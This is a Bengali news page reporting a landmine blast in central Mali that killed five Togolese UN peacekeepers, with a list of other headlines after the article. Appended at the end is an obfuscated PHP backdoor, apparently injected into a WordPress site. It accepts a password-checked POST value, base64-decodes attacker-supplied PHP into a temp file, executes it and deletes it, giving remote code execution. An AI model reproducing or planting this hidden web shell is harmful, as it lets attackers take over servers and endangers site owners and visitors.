বুধবার, ১৯শে জুন, ২০২৪ খ্রিস্টাব্দ ৫ই আষাঢ়, ১৪৩১ বঙ্গাব্দ

মালিতে মাইন বিস্ফোরণে পাঁচ শান্তিরক্ষী নিহত

 

আন্তর্জাতিক ডেস্ক :পশ্চিম আফ্রিকার দেশ মালিতে মাইন বিস্ফোরণে পাঁচজন শান্তিরক্ষী নিহত হয়েছেন। গুরুতর আহত হয়েছেন আরো একজন। স্থানীয় সময় গতকাল রোববার বেলা ১১টার দিকে মধ্য মালির মপতি অঞ্চলে মাইন বিস্ফোরণের ঘটনা ঘটে।গতকাল রোববার ছিল জাতিসংঘের শান্তিরক্ষী দিবস। এ দিনেই মালিতে মাইন বিস্ফোরণে শান্তিরক্ষী নিহত ও আহতের ঘটনা ঘটল।

photo-1464582306

 

বিবিসি জানায়, মপতি অঞ্চলের রাস্তায় পুঁতে রাখা মাইন বিস্ফোরণে শান্তিরক্ষীদের বহনকারী একটি গাড়িতে আগুন ধরে যায়। নিহত ও আহত সব শান্তিরক্ষীই আফ্রিকার অপর দেশ টোগোর।মধ্য মালির মপতি অঞ্চল মেসিনা লিবারেশন ফ্রন্টের শক্ত ঘাঁটি। এই গোষ্ঠীর সঙ্গে আল-কায়েদার যোগাযোগ আছে বলে ধারণা করা হয়। মাইন বিস্ফোরণের সঙ্গে মেসিনা ফ্রন্ট যুক্ত থাকতে পারে। তবে এখনো কোনো সন্ত্রাসী গোষ্ঠী হামলার দায় স্বীকার করেনি।

 

 

ইসলামপন্থী ও তুয়ারেগ যোদ্ধাদের দমনে এবং মালিতে শান্তি প্রতিষ্ঠায় ২০১৩ সালে সেখানে জাতিসংঘের মিশন শুরু হয়। মালির মধ্য ও উত্তরাঞ্চলে প্রায়ই শান্তিরক্ষীরা হামলার শিকার হন। বর্তমানে মালিতে ১২ হাজার শান্তিরক্ষী কাজ করছে।অবশ্য জাতিসংঘ মিশন শুরুর আগেই ফ্রান্সের সেনারা মালিতে অবস্থান নিয়েছিল। ফ্রান্সের সাবেক উপনিবেশ মালি।

এর আগে ২০১৫ সালে মালির রাজধানী বামাকোতে ভয়াবহ সন্ত্রাসী হামলার ঘটনা ঘটে। ওই হামলায় দুই বন্দুকধারীসহ ২২ জন নিহত হয়।

জাতিসংঘের হিসাব অনুযায়ী, গত বছর ১৬টি দেশে শান্তিরক্ষার মিশনে ১২০ জন জাতিসংঘের কর্মী নিহত হয়েছেন।

এ জাতীয় আরও খবর

মুক্তিযোদ্ধার ভুয়া সনদ : ভাতা সুদে-আসলে ফেরত নেবে সরকার

তানজিমকে শাস্তি দিয়েছে আইসিসি

সুনামগঞ্জে বন্যা পরিস্থিতির আরও অবনতির শঙ্কা

পিয়ংইয়ং পৌঁছেছেন রুশ প্রেসিডেন্ট পুতিন

নতুন সময়সূচি চালু : আজ থেকে ব‌্যাংক লেনদেন ১০-৪টা, অফিস চলবে ৬টা পর্যন্ত

তীব্র তাপপ্রবাহের মধ্যে এ বছর ৫৫০ হজযাত্রীর মৃত্যু

ব্রাহ্মণবাড়িয়ায় তিনহাজার টাকা পাওনা নিয়ে হাতাহাতি, বৃদ্ধের মৃত্যু

বছরের সবচেয়ে দামি নায়িকা দীপিকা

বুবলির নাম মুখে নিতে ‘ঘেন্না’ লাগে অপুর

তুফান সিনেমা দেখতে গিয়ে হল ভাঙচুর করলো দর্শকেরা

পতন ঘটতে পারে সরকারের, মোদির জোটের লোকজন যোগাযোগ করছেন : রাহুল

জীবিকার তাগিদ ঘরে ফিরতে দেয়নি তাদের

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}